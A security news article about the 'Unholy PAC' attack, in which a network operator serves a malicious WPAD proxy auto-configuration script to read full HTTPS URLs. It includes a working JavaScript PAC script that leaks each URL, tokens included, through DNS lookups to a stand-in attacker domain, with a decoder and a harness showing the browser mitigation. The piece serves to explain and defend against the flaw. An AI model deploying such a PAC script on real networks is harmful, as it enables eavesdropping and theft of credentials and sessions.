Flaw in HTTPS encryption enables network operators to eavesdrop on web users

Windows, Linux and Mac users equally at risk

A newly disclosed weakness in the way browsers handle proxy auto-configuration lets network operators see which URLs web users visit over HTTPS, without breaking the encryption itself.

The attack does not break the HTTPS encryption; it sidesteps it. HTTPS would normally prevent the operator from seeing the URLs visited by users, since only the server's hostname is exposed before the connection is encrypted. But browsers with proxy auto-detection (WPAD) enabled ask the local network, via DHCP or a DNS lookup for a 'wpad' host, where to fetch a proxy auto-configuration (PAC) script, and then run that script's JavaScript for every request, handing it the full URL, path and query string included, before anything is sent to the server. Whoever controls the network can therefore have the browser feed every URL it is about to fetch to code of their choosing.

Itzik Kotler, chief technology officer and co-founder of security company SafeBreach, along with Amit Klein, vice president of security research at the same company, will demonstrate how the attack works at next week's Black Hat conference in a talk entitled 'Crippling HTTPS with Unholy PAC'.

"We will demonstrate that, by forcing your browser/system to use a malicious PAC (proxy auto-configuration) resource, it is possible to leak HTTPS URLs," the pair wrote on the Black Hat site.

"We will explain how this affects the privacy of the user and how credentials/sessions can be stolen. We will present the concept of 'PAC malware' (a malware which is implemented only as JavaScript logic in a PAC resource) that features a two-way communication channel between the PAC malware and an external server, contextual phishing via messages, denial-of-service options, and sensitive data extraction from URLs.

"We present a comprehensive browser PAC feature matrix and elaborate more about this cross-platform (Linux, Windows, Mac) and cross-browser (IE, Chrome, Safari) threat."
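To make the mechanism concrete, here is an added example, not code from the SafeBreach researchers or their talk, of a malicious PAC script together with a small Node.js harness that evaluates it roughly the way a browser's PAC engine does. The attacker domain leak.example, the dnsResolve() stub, and the sample URL are constructed for this example. The script exfiltrates the full URL through dnsResolve(), a standard PAC helper, and returns DIRECT so the page loads normally. The harness also shows the mitigation major browsers now apply, passing only the origin of https:// URLs to the PAC script, so that the same script then learns nothing beyond the hostname.

```javascript
// Added example (not the researchers' code): a malicious PAC script plus a
// Node.js harness that evaluates it the way a browser does. The domain
// leak.example, the dnsResolve() stub and the sample URL are constructed here.

// What an attacker-controlled DNS server would observe. The real PAC sandbox
// provides dnsResolve(); this stub records the query name it is asked for.
const observedDnsQueries = [];
function dnsResolve(hostname) {
  observedDnsQueries.push(hostname);
  return "203.0.113.1"; // any answer will do, the query itself is the leak
}

// The malicious PAC resource a network operator could serve via WPAD. It hex
// encodes the URL it was handed, chunks it into DNS labels (max 63 octets each),
// triggers a lookup under the attacker's domain, then returns DIRECT so the
// request proceeds normally and the user notices nothing.
const MALICIOUS_PAC = `
function FindProxyForURL(url, host) {
  var hex = "";
  for (var i = 0; i < url.length; i++) {
    var c = url.charCodeAt(i).toString(16);  // URLs are ASCII, so two digits each
    hex += (c.length < 2 ? "0" : "") + c;
  }
  var labels = hex.match(/.{1,60}/g) || [];
  dnsResolve(labels.join(".") + ".leak.example");
  return "DIRECT";
}
`;

// Build FindProxyForURL from PAC source with the helper function in scope,
// roughly as a browser's PAC evaluator does.
function loadPac(source) {
  return new Function("dnsResolve", source + "\nreturn FindProxyForURL;")(dnsResolve);
}

// Attacker side: reconstruct the URL from the DNS query name.
function decodeLeak(qname) {
  if (!qname) return null;
  const hex = qname.replace(/\.leak\.example$/, "").split(".").join("");
  return Buffer.from(hex, "hex").toString("utf8");
}

// Pre-mitigation behaviour: the browser hands the PAC script the full URL,
// path and query string included, before any TLS handshake happens.
function runVulnerableBrowser(pacSource, fullUrl) {
  observedDnsQueries.length = 0;
  const decision = loadPac(pacSource)(fullUrl, new URL(fullUrl).hostname);
  return { decision, leaked: decodeLeak(observedDnsQueries[0]) };
}

// Mitigation now applied by major browsers: for https:// URLs, pass only the
// origin to the PAC script. http:// URLs are already visible on the wire, so
// they are passed through unchanged.
function sanitizeUrlForPac(fullUrl) {
  const u = new URL(fullUrl);
  return u.protocol === "https:" ? u.origin + "/" : fullUrl;
}

function runHardenedBrowser(pacSource, fullUrl) {
  observedDnsQueries.length = 0;
  const decision = loadPac(pacSource)(sanitizeUrlForPac(fullUrl), new URL(fullUrl).hostname);
  return { decision, leaked: decodeLeak(observedDnsQueries[0]) };
}

// Constructed sample: a password-reset link whose token should never leave TLS.
const SAMPLE_URL = "https://bank.example/reset?token=3f9a2c&user=alice";

console.log("vulnerable browser:", runVulnerableBrowser(MALICIOUS_PAC, SAMPLE_URL));
console.log("hardened browser:  ", runHardenedBrowser(MALICIOUS_PAC, SAMPLE_URL));
```

Run it with `node` and the first line shows the reset token recovered verbatim from the DNS query name, while the second shows the hardened browser leaking only `https://bank.example/`. Note that DNS is only the quietest channel: the same script could instead return a `PROXY attacker:8080` directive and route the request through the operator, which is why the talk's abstract also speaks of session theft and phishing.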

This isn't the first time that HTTPS has been reported as compromised. Researchers analysing documents released by whistleblower Edward Snowden concluded that the US National Security Agency has for years been able to decrypt a large share of HTTPS traffic by attacking the Diffie-Hellman key exchange, a common way to agree cryptographic keys over untrusted channels: many servers shared the same handful of 1024-bit groups, so a one-off precomputation against each group unlocks every session that uses it.

A story emerged earlier this year suggesting that internet users could bypass ISP blocks on torrent sharing and other media streaming sites of dubious legality simply by adding an 's' to the end of 'http' in the address. Where that worked, it was because the block inspected URLs in plaintext HTTP traffic, which HTTPS hides from the ISP; that is the very visibility a malicious PAC file hands back to the network operator.